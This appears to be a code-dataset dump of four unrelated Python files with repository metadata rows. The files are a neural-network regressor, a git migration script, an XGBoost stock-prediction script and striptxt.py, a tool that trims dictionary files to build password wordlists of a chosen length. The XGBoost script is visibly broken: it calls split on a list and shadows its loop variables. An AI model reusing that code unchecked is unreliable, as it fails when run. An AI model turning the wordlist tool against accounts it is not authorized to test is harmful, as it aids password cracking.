class NeuralNetwork(BaseEstimator, RegressorMixin, object):
_maxSteps = None
_maxNonChangingSteps = None
_learningRate = None
_shrinkage = None
_architecture = None
_momentum = None
_useDropout = None
_alphaStandout = None
_betaStandout = None
_warmStart = None
_batchSize = None
_weights = None
_inputDimension = None
_outputDimension = None
_step = None
_lastDelta = None
_percentageDropout = None
_inputNormalizer = None
_outputNormalizer = None
def __init__(self, maxSteps=50, maxNonChangingSteps=5, learningRate=1e-6, shrinkage=0.9, architecture=[10],
momentum=0.7, useDropout=False, alphaStandout=0, betaStandout=0.5, warmStart=False,
startingWeights=None, batchSize = 1, step = 0, lastDelta = None, percentageDropout=1):
self._maxSteps = maxSteps
self._maxNonChangingSteps = maxNonChangingSteps
self._learningRate = learningRate
self._shrinkage = shrinkage
self._architecture = architecture
self._momentum = momentum
self._useDropout = useDropout
self._alphaStandout = alphaStandout
self._betaStandout = betaStandout
self._warmStart = warmStart
self._weights = startingWeights
self._batchSize = batchSize
self._step = step
self._lastDelta = None
self._percentageDropout = percentageDropout
def get_params(self, deep=True):
params = {}
params["maxSteps"] = self._maxSteps
params["maxNonChangingSteps"] = self._maxNonChangingSteps
params["learningRate"] = self._learningRate
params["shrinkage"] = self._shrinkage
params["architecture"] = self._architecture
params["momentum"] = self._momentum
params["useDropout"] = self._useDropout
params["alphaStandout"] = self._alphaStandout
params["betaStandout"] = self._betaStandout
params["warmStart"] = self._warmStart
params["batchSize"] = self._batchSize
params["step"] = self._step
params["lastDelta"] = self._lastDelta
params["percentageDropout"] = self._percentageDropout
return params
def _initializeWeights(self, randomState=0):
randomState = check_random_state(randomState)
self._weights = []
for k in range(len(self.neuronsPerLayer())-1):
self._weights.append(np.ones(shape=(self.neuronsPerLayer()[k]+1, self.neuronsPerLayer()[k+1])))
for k in range(len(self.neuronsPerLayer())-1):
for i in range(len(self._weights[k])):
for j in range(len(self._weights[k][i])):
#Starting weights are set randomly, dependant on the number of inputs. Compare lecture 17, neuralnetworks slide 10.
self._weights[k][i][j] = randomState.uniform(0, 1)/(self.neuronsPerLayer()[k+1])**0.5
#self._weights[k][i][j] = randomState.uniform(0, 1)
def _batchify(self, X, batchSize, y=None):
#first, set the batches.
#A list of feature matrixes, with the ith column representing the ith example of said feature.
index = 0
batchFeatures = []
#A list of matrices in the one of k coding scheme.
if not y is None:
batchTargets = []
while index < len(X):
if batchSize != 0:
numberExamples = min(batchSize, len(X) - index)
else:
numberExamples = len(X)
batchFeatures.append(np.ones(shape=(self._inputDimension+1, numberExamples)))
if (not y == None):
batchTargets.append(np.zeros(shape=(self._outputDimension, numberExamples)))
for i in range(numberExamples):
for j in range(self._inputDimension):
batchFeatures[-1][j, i] = X[index, j] #TODO in case of multiple dimensions, break glass.
#Now, set the one out of k training scheme
if (not y == None):
for j in range(self._outputDimension):
batchTargets[-1][j, i] = y[index, j]
#batchTargets[-1][0, i] = y[index]
index += 1
if not y == None:
return batchFeatures, batchTargets
else:
return batchFeatures
def neuronsPerLayer(self):
neuronsPerLayer = []
neuronsPerLayer.append(self._inputDimension)
neuronsPerLayer.extend(self._architecture)
neuronsPerLayer.append(self._outputDimension)
return neuronsPerLayer
def set_params(self, **parameters):
for parameter, value in parameters.items():
if (parameter == 'maxSteps'):
self._maxSteps = value
elif (parameter == 'maxNonChangingSteps'):
self._maxNonChangingSteps = value
elif (parameter == 'learningRate'):
self._learningRate = value
elif (parameter == 'shrinkage'):
self._shrinkage = value
elif (parameter == 'architecture'):
self._architecture = value
elif (parameter == 'momentum'):
self._momentum = value
elif (parameter == 'useDropout'):
self._useDropout = value
elif (parameter == 'alphaStandout'):
self._alphaStandout = value
elif (parameter == 'betaStandout'):
self._betaStandout = value
elif (parameter == 'warmStart'):
self._warmStart = value
elif (parameter == 'batchSize'):
self._batchSize = value
elif (parameter == 'step'):
self._step = value
elif (parameter == 'lastDelta'):
self._lastDelta = value
elif parameter == 'percentageDropout':
self._percentageDropout = value
return self
def calcLayerOutputsBatch(self, batchFeatures, doDropout, randomState = 0):
randomState = check_random_state(randomState)
dropoutVectors = []
numExamples = batchFeatures.shape[1]
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k]+1, numExamples)))
else:
#else.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k], numExamples)))
outputsPerLayer = []
outputsPerLayer.append(batchFeatures)
for k in range(0, len(self._weights)): #All the same except for the output layer.
if (k == len(self._weights)-1): # Do not append the bias.
#outputsPerLayer.append(np.maximum(np.matrix(np.dot(self._weights[k].transpose(), outputsPerLayer[k])), 0))
#outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
else: #Do append the bias neuron.
outputsPerLayer.append(np.ones((self.neuronsPerLayer()[k+1]+1, numExamples)))
inputThisLayer = np.dot(self._weights[k].transpose(), outputsPerLayer[k])
#outputsPerLayer[k+1][:self.neuronsPerLayer()[k+1]] = np.maximum(inputThisLayer[:self.neuronsPerLayer()[k+1]], 0)
#print(inputThisLayer)
outputsPerLayer[k+1][:-1] = self.sigmoid(inputThisLayer)
if (self._useDropout):
dropoutNeuronNumber = int(self.neuronsPerLayer()[k+1]*self._percentageDropout)
dropoutVectors[k+1][:dropoutNeuronNumber] = np.clip(self.sigmoidStandout(self._alphaStandout * inputThisLayer + self._betaStandout), 0, 1)[:dropoutNeuronNumber]
#print(dropoutVectors[k+1])
if (doDropout):
dropoutVectors[k+1] = np.ones((dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])) * dropoutVectors[k+1] > np.random.rand(dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])
#print(dropoutVectors[k+1])
outputsPerLayer[k+1] = np.multiply(outputsPerLayer[k+1], dropoutVectors[k+1])
#print(outputsPerLayer[-1])
if (doDropout):
return outputsPerLayer, dropoutVectors
else:
return outputsPerLayer, dropoutVectors
def _learnFromBatch(self, batchFeatures, batchTargets):
outputsPerLayer, dropoutVectors = self.calcLayerOutputsBatch(batchFeatures, True)
errorsPerLayer = []
for i in range(len(outputsPerLayer)-1):
errorsPerLayer.append(np.zeros((outputsPerLayer[i].shape[0], len(batchTargets))))
#Set the error for the output layer.
errorsPerLayer.append(batchTargets - outputsPerLayer[-1])
#now, it gets funny.: Calculate all of the errors. In both cases. dropout applies to the errorsPerLayer, too. A neuron that isn't 'active' will have no error.
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1])
else:
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1][0:-1])
if (self._useDropout):
errorsPerLayer[k] = np.multiply(errorsPerLayer[k], dropoutVectors[k])
#Calculate the deltaW.
deltaW = []
for k in range(len(self._weights)):
deltaW.append(np.zeros(shape=self._weights[k].shape))
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative).transpose()
tmp = np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]).transpose()
else:
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative)[0:-1].transpose()
tmp = (np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]))[0:-1].transpose()
#And again, a neuron which doesn't exist won't cause deltaWs.
if (self._useDropout):
deltaW[k] = np.dot(np.multiply(outputsPerLayer[k], dropoutVectors[k]), tmp)
else:
deltaW[k] = np.dot(outputsPerLayer[k], tmp)
#print(deltaW)
#raw_input()
return deltaW
def fit(self, X, y):
X = np.matrix(X)
y = np.matrix(y)
self._outputNormalizer = MinMaxScaler()
self._inputNormalizer = MinMaxScaler()
self._outputNormalizer = self._outputNormalizer.fit(y)
self._inputNormalizer = self._inputNormalizer.fit(X)
self._inputDimension = X.shape[1]
self._outputDimension = y.shape[1]#For now, hardcoded to 1-dimensional regression problems.
if (not self._warmStart or self._weights == None):
self._initializeWeights()
self._lastDelta = None
batchFeatures, batchTargets = self._batchify(np.matrix(self._inputNormalizer.transform(X)), self._batchSize,
np.matrix(self._outputNormalizer.transform(y)))
#do for each step until the maximum steps:
for i in range(self._maxSteps):
reducedLearningRate = self._learningRate * self._shrinkage ** self._step
for j in range(len(batchFeatures)):
deltaW = self._learnFromBatch(batchFeatures[j], batchTargets[j])
if (self._lastDelta == None):
self._lastDelta = deltaW
for k in range(len(self._weights)):
self._lastDelta[k] = ((1-self._momentum) * deltaW[k] + self._momentum * self._lastDelta[k])
self._weights[k] = self._weights[k] + reducedLearningRate * self._lastDelta[k]
#self._positifyWeights()
self._step += 1
#print(step)
return self
def predict(self, X, debug=False):
X = np.matrix(X)
batchFeatures = self._batchify(self._inputNormalizer.transform(X), self._batchSize)
batchResults = np.zeros((X.shape[0], self._outputDimension))
dropoutResults = []
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k]+1, 1)))
else:
#else.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k], 1)))
begin = 0
end = batchFeatures[0].shape[1]
for i in range(len(batchFeatures)):
outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(batchFeatures[i], False)
outputsLast = outputsLast[-1]
batchResults[begin:end, :] = outputsLast.transpose()
begin = end
end = end + batchFeatures[i].shape[1]
#for featureList in batchFeatures:
# outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(featureList, False)
# outputsLast = outputsLast[-1]
# batchResults.extend(list(np.array(outputsLast).reshape(-1,)))
# for i in range(len(dropoutFeatures)):
# summed = np.matrix(np.sum(dropoutFeatures[i], 1)).transpose()
# dropoutResults[i] += summed
batchResults = np.matrix(batchResults)
if (debug):
return self._outputNormalizer.inverse_transform(batchResults), dropoutResults
else:
return self._outputNormalizer.inverse_transform(batchResults)
def sigmoid(self, X):
#return 1 / (1 + np.exp(-X))
return 0.5 * (X/(1+abs(X))+1)
def sigmoidStandout(self, X):
#return 1 / (1 + np.exp(-X))
sigmoidResult = 0.5 * (X/(1+abs(X))+1)
#return 4*(sigmoidResult * (1-sigmoidResult))
return sigmoidResult
|
mit
| 6,231,215,392,406,471,000
| 44.602524
| 214
| 0.590384
| false
| 4.010821
| false
| false
| false
|
NulledGravity/striptxt
|
striptxt.py
|
1
|
5271
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os, time, sys
from sys import argv, stdout
# Global variables
INPUT = None
OUTPUT = None
LENGTH = None
VERBOSE = False
AUTOOUT = False
AUTOLEN = False
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[92m' # green
B = '\033[34m' # blue
O = '\033[91m' # orange
GR = '\033[94m' # gray
P = '\033[35m' # purple
C = '\033[36m' # cyan
BO = '\033[1m' #bold
def Credits():
os.system('clear')
print(O + ' _____ _ _ _______ _ \n' +
' / ____| | (_) |__ __| | | \n' +
' | (___ | |_ _ __ _ _ __ | |_ _| |_ \n' +
' \___ \| __| \'__| | \'_ \| \ \/ / __| \n' +
' ____) | |_| | | | |_) | |> <| |_ \n' +
' |_____/ \__|_| |_| .__/|_/_/\_\\__| \n' +
' | | \n' +
' |_| \n' + W)
print(W + BO + ' StripTxt v1' + W)
print(C + ' - automated text file word length limiter' + W)
print(C + ' - designed for Linux, for extracting passwords\n of desired length from dictionary files' + W + '\n')
print(B + ' https://github.com/NulledGravity/striptxt' + W + '\n\n')
def VerifyGlobals():
global INPUT, OUTPUT, LENGTH, VERBOSE, AUTOOUT, AUTOLEN
cwd = os.getcwd()
if not INPUT:
print(GR + ' [+] ' + R + 'You must define an input file!')
ExitLikeABitch(0)
if not os.path.isfile(INPUT):
print(GR + ' [+] ' + R + 'The input file was not found at the following path!')
print(GR + ' ' + cwd + os.sep + INPUT)
if not OUTPUT:
OUTPUT = 'out.txt'
AUTOOUT = True
if not LENGTH:
LENGTH = 8
AUTOLEN = True
if VERBOSE:
if AUTOOUT:
print(GR + ' [+] ' + W + 'You have not defined an output file!')
print(GR + ' [+] ' + 'The file will be created automatically at:')
print(GR + ' ' + cwd + os.sep + OUTPUT)
if AUTOLEN:
print(GR + ' [+] ' + W + 'You have not defined the desired string length')
print(GR + ' [+] ' + 'The default length will be ' + W + '8')
def ProcessTextFile():
try:
bunchsize = 1000000
bunch = []
with open(INPUT, 'r', encoding='latin-1') as r, open(OUTPUT, 'w', encoding='latin-1') as w:
print('\n' + GR + ' [+] ' + BO + 'starting processing' + W)
i = 0
for line in r:
if len(line) < (LENGTH + 1): continue
bunch.append(line)
PrintStatus(i)
if len(bunch) == bunchsize:
w.writelines(bunch)
bunch = []
i += 1
w.writelines(bunch)
print('\n')
except KeyboardInterrupt:
print('\n' + R + ' (^C) ' + O + 'interrupted\n' + W)
ExitLikeABitch(0)
def PrintStatus(index):
print(GR + ' [+] ' + W + BO + str(index) + W + ' lines processed', end='')
sys.stdout.write('\r')
sys.stdout.flush()
def HandleArguments():
global INPUT, OUTPUT, LENGTH, VERBOSE
args = argv[1:]
if args.count('?') + args.count('-h') + args.count('-help') + args.count('--help') > 0:
Help()
ExitLikeABitch(0)
try:
for i in range(0, len(args)):
if args[i] == '-l':
i += 1
LENGTH = int(args[i])
elif args[i] == '-i':
i += 1
INPUT = args[i]
elif args[i] == '-o':
i += 1
OUTPUT = args[i]
elif args[i] == '-v':
VERBOSE = True
except IndexError:
print('error')
print('\n' + R + '[!]' + W + 'indexerror\n\n')
def Help():
HelpIndent('Commands')
HelpIndent('-i' + W + ' <file>' + GR + ' set path to the dictionary', type=1)
HelpIndent('-o' + W + ' <file>' + GR + ' specify path for output, otherwise the file', type=1)
HelpIndent(GR + 'will be saved in the current directory', type=1, spaces=23)
HelpIndent('-l' + W + ' <lenght>' + GR + ' the lenght of strings to be saved, default value: 8', type=1)
HelpIndent('-v' + GR + ' show extra info on run', type=1)
print()
HelpIndent('Example')
HelpIndent(W + 'striptxt.py -i dictionary.txt', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -l 10', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -o newDictionary.txt -l 5', type=1)
print()
HelpIndent('-h, ?, --help, -help' + GR + ' show this help message', type=2)
print()
def HelpIndent(message="", type=0, spaces=4, insidePrint=True):
if type == 1 and spaces == 4: spaces = 8
out = ""
i = 0
for i in range(spaces):
out += ' '
i += 1
if type == 0: out += GR + message.upper()
if type == 1 or type == 2: out += O + message
out += W
if insidePrint:
print(out)
else:
return out
def ExitLikeABitch(code=0):
print(GR + ' [+] ' + W + 'quitting\n')
# GFY BITCH <3
exit(code)
def main():
Credits()
HandleArguments()
VerifyGlobals()
ProcessTextFile()
if __name__ == '__main__':
main()
|
mit
| 3,570,116,909,102,634,000
| 32.157233
| 117
| 0.47012
| false
| 3.204255
| false
| false
| false
|
fredyw/git-migrator
|
gitmigrator.py
|
1
|
3703
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Fredy Wijaya
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, subprocess, logging, argparse, shutil, stat, errno
logger = None
def execute(cmd):
logger.info('Command: %s' % ' '.join(cmd))
subprocess.check_call(cmd)
def execute_output(cmd):
branches = []
pattern = 'remotes/origin/'
out = subprocess.check_output(cmd)
for line in out.split(os.linesep):
stripped_line = line.strip()
if stripped_line.startswith(pattern):
if stripped_line.startswith(pattern + 'HEAD'): continue
branches.append(stripped_line[len(pattern):])
return branches
# this workaround is needed for Windows
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
if func in (os.rmdir, os.remove) and excvalue.errno == errno.EACCES:
os.chmod(path, stat.S_IRWXU| stat.S_IRWXG| stat.S_IRWXO) # 0777
func(path)
else:
raise
def migrate(src_repo, dest_repo):
tmp_repo = '.tmprepo'
new_remote = 'newremote'
old_cwd = os.getcwd()
try:
if os.path.exists(tmp_repo):
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
execute(['git', 'clone', src_repo, tmp_repo])
os.chdir(tmp_repo)
branches = execute_output(['git', 'branch', '-a'])
execute(['git', 'remote', 'add', new_remote, dest_repo])
for branch in branches:
execute(['git', 'push', new_remote,
'+refs/remotes/origin/' + branch + ':' +
'refs/heads/' + branch])
execute(['git', 'push', new_remote, '--tags'])
finally:
os.chdir(old_cwd)
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
def configure_logger():
global logger
FORMAT = '%(asctime)s [%(levelname)-5s] %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger('gitmigrator')
def help_formatter():
return lambda prog: argparse.HelpFormatter(prog, max_help_position=30)
def validate_args():
parser = argparse.ArgumentParser(formatter_class=help_formatter())
parser.add_argument('--source', type=str, required=True,
help='source repository URL')
parser.add_argument('--destination', type=str, required=True,
help='destination repository URL')
return parser.parse_args()
if __name__ == '__main__':
configure_logger()
args = validate_args()
try:
migrate(args.source, args.destination)
except Exception as e:
logger.error(str(e))
sys.exit(1)
|
mit
| -2,902,482,159,053,309,400
| 37.175258
| 88
| 0.662436
| false
| 3.861314
| false
| false
| false
|
zlpmichelle/crackingtensorflow
|
template/xgboost/xgboost_stock_pre.py
|
1
|
1349
|
import sys
import xgboost as xgb
import pandas as pd
import numpy as np
print("----reading data\n")
train = pd.read_csv("train.csv")
train_feature = train.columns[0:-1]
train_label = train.columns[-1]
print("----training a XGBoost\n")
dtrain = xgb.DMatrix(train[train_feature].values, label=train[train_label].values)
param = {'max_depth': 5,
'eta': 1,
'eval_metric': 'auc'}
bst = xgb.train(param, dtrain, 30)
print("----predict stock\n")
fi = open("test.csv", 'r')
fulldata = []
linenum=0
features_num = 500
fea_str =[]
for line in fi:
if linenum%100==0: sys.stderr.write('%f\n' % linenum)
linenum += 1
try:
features = line.strip("\n").split(",")
data = []
inx = 1
for i in features.split(','):
if inx > int(features_num):
continue
inx += 1
data.append(float(i))
fulldata.append(data)
fea_str.append('%s' % '\t'.join(features))
except Exception as e:
sys.stderr.write('Exception: %s\n' % str(e))
sys.stderr.write('wrong line: %s\n' % line)
pass
xgb_input = np.array(fulldata)
label = np.array([-1])
test = xgb.DMatrix(xgb_input, label=label)
pred = bst.predict(test)
print("--- print result")
for fea_str, pred in zip(fea_str, pred):
print(fea_str + '\t' + str(pred) + '\n')
|
apache-2.0
| 927,858,347,399,894,100
| 23.089286
| 82
| 0.581913
| false
| 3.011161
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.